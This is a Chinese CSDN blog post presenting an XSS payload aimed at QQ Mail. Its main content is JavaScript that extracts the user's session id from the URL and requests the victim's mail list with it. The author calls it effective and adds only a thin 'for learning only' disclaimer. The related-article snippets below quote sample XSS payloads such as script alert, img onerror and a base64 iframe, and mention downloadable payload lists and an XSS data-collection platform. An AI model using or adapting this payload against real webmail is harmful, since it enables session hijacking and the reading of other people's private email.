QQ邮箱有效的XSS payload

最新推荐文章于 2024-05-30 20:36:06 发布
最新推荐文章于 2024-05-30 20:36:06 发布
阅读量1.3k 收藏 1
点赞数 1
分类专栏: 渗透 XSS 文章标签: 渗透 XSS QQ邮箱 Paylaod
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38224315/article/details/90409577
版权

QQ邮箱XSS注入攻击有效payload

1 network中看到请求,经过分析后找到实际请求
实际请求
遂将所有参数修改,并截取有效sid

	var sid="";
    if(top.window.location.href.indexOf("sid")>0){
         var href=top.window.location.href;

	 sid=href.substring(href.indexOf("sid")+4,href.indexOf("&"));
}
console.log("sid="+sid)
var  floder_url="https://"+top.window.location.host+"
/cgi-bin/mail_list?sid="+sid+"&page=0&sortasc=0&sorttype=7";

var ajax=null;
if(window.XMLHttpRequest){
    ajax=new XMLHttpRequest();
}else if (window.ActiveXObject){
	ajax=new ActiveXObject("Microsoft")
}
console.log("ajax="+ajax);
ajax.open("GET",floder_url,true)
ajax.send(null);
console.log(ajax);
if(ajax.readyState==4&&ajax.status==200){
	console.log("ajax="+ajax.responseText);
}

最终响应为payload响应
该文档Payload有效
ps:该文档仅供学习切勿犯法,如需转载,需注明出处。

我是一个罪人
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
跨站脚本攻击(XSS)进阶
悦分享
07-08 269
跨站脚本攻击(XSS)是客户端脚本安全中的头号大敌。OWASP TOP 10威胁多次把XSS列在榜首。跨站脚本攻击,英文全称是 Cross Site Script,本来缩写是 CS S,但是为了和层叠样式表(Cascading Style Sheet,CSS)有所区别,所以在安全领域叫做“XSS”。XSS攻击,通常指黑客通过“HTML注入”篡改了网页,插入了恶意的脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。在一开始,这种攻击的演示案例是跨域的,所以叫做“跨站脚本”。
xss常见payload脚本
09-01
xsspayload包括各种标签的payload,类似于字典。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。。...
强大的XSS Payload
Killua
03-23 8911
1.构造post方式的html表单背景:某博客存在存储型xss漏洞操作:通过使用js脚本构造一个XSS Payload自动创建文章。实验的价值在于,只要成功了意味着可以模拟GET POST请求操作用户的浏览器。这在cookie劫持失败以后比较有用,如当受害者点击了恶意链接后,自己加载黑客的脚本,脚本模拟GET或者POST操作,这样就可以查看受害者的邮箱等待。实际上是模拟浏览器发送一个post给服务...
2024年网络安全最全【XSS平台】使用,简单 payload 项目的创建(1),分享一点面试小经验
2401_84301948的博客
05-11 666
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!内容实在太多,不一一截图了。
XSS原理+DOMXSS实战
weixin_46128614的博客
03-22 1395
1. XSS成因 用户在客户端输入一个内容,服务端收到这个内容,并把它嵌入网页再返回给用户,这是一个常见的功能。如果用户输入的这个内容是一段精心构造的js代码,服务端恰好没有过滤,那返回的js就会被浏览器执行。 2. XSS分类 2.1 反射型 常见把js构造在URL中,然后引导其他人点击这个恶意URL,造成反射型XSS 2.2 存储型 把恶意的js发送到服务端并存储,以后其他用户每次浏览页...
web攻击:XSS跨站脚本
yk10010的博客
02-15 888
一、浏览器安全 同源策略  影响源的因素:host,子域名,端口,协议  a.com通过以下代码: <script scr=http://b.com/b.js> 加载了b.com上的b.js,但是b.js是运行在a.com页面中的,因此相对于当前打开的页面(a.com)来说,b.js的源就应该是a.com而非b.com 不同于XMLHttpRequest的是,通过src属性加载...
Dom型xss的理解和反射型xss实战操作
NLost
06-18 967
Dom型xss类似于反射型xss,但是不同点在于DOM 型的 XSS 主要是由客户端的js脚本通过 DOM 动态地输出数据到页面上,它不依赖于提交数据到服务器,而是从客户端获得DOM中的数据在本地执行。
XSS漏洞学习笔记
淚笑的博客
06-24 923
浏览器安全跨站脚本攻击XSS简介XSS攻击进阶XSS攻击平台终极武器:XSS WormXSS构造技巧XSS的防御HttpOnly输入检查输出检查正确地防御XSS处理富文本防御DOM Based XSS换个角度看XSS的风险 浏览器安全同源策略 影响源的因素:host,子域名,端口,协议 a.com通过以下代码:<script scr=http://b.com/b.js>加载了b.com...
XSS数据接收平台
jijisaq的博客
05-30 1080
公众号:【吉吉说安全】,对我发消息【20240517】免费获取免责声明由于传播、利用本公众号所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,本公众号及作者不为此承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。
php xss ctf,GitHub - qiaofei32/BlueLotus_XSSReceiver: XSS平台 CTF工具 Web安全工具
weixin_39984201的博客
04-08 272
XSS数据接收平台(无SQL版)如从旧版本升级,请务必先阅读Readme平台说明本平台设计理念: 简单配置即可使用,无需数据库,无需其他组件支持,可直接在php虚拟空间使用SAE用户请切换到sae分支,并阅读sae分支下的README.md安装说明自动安装安装http server与php环境(ubuntu: sudo apt-get install apache2 php5 或 sudo apt...
web安全(XSS&CSRF)
u011386690的专栏
07-16 1161
客户端(浏览器)安全  同源策略(Same Origin Policy) 同源策略阻止从一个源加载的文档或脚本获取或设置另一个源加载的文档的属性。   如: 不能通过Ajax获取另一个源的数据; JavaScript不能访问页面中iframe加载的跨域资源。   对 http://store.company.com/dir/pag
XSS payload大全
01-22
总结的XSSpayload,可以直接使用,直接进行攻击,各种payload
xss payload下载
04-03
多达5500多条xss payload提供下载,方便渗透测试人员更好地fuzz目标站点,检测xss漏洞是否存在
2020年仍然有效的一些XSS Payload
11-05
"2020年仍然有效的一些XSS Payload" XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的Web应用程序漏洞,攻击者可以通过在Web页面中inject恶意脚本代码来攻击用户。XSS攻击可以导致用户数据泄露、身份盗用、...
XSS测试payload
09-19
XSS测试payload,收集了简单的XSS测试用例,较具有实用性。
Java面试整理,涵盖基础、JVM、线程并发、框架、MySQL、微服务、Redis、中间件、数据结构与算法等。陆续完善中.zip
07-31
Java面试整理,涵盖基础、JVM、线程并发、框架、MySQL、微服务、Redis、中间件、数据结构与算法等。陆续完善中
chromedriver-mac-x64_121.0.6167.184.zip
最新发布
07-31
chromedriver-mac-x64_121.0.6167.184.zip
【Java面试+Java技术文章汇总】 涵盖大部分Java程序员所需要掌握的核心知识。.zip
07-31
【Java面试+Java技术文章汇总】 涵盖大部分Java程序员所需要掌握的核心知识。
xss payload
09-30
XSS(跨站脚本攻击) Payload是一种攻击技术,通过在网页中插入恶意代码来窃取用户信息或者对用户进行攻击。以下是几个XSS Payload的例子: 1. `<script>alert('XSS')</script>`:这个Payload会在页面加载时执行一个弹窗提醒,展示文本"XSS"。 2. `<img src='x' onerror='alert(1)'>`:这个Payload会尝试加载一个不存在的图片。由于图片加载失败,就会触发onerror事件,然后执行弹窗提醒,展示数字"1"。 3. `<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxMjM0KTs8L3NjcmlwdD4NCg=="></iframe>`:这个Payload将一个base64编码的脚本插入到一个隐藏的iframe中。这段脚本会执行一个弹窗提醒,展示数字"1234"。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值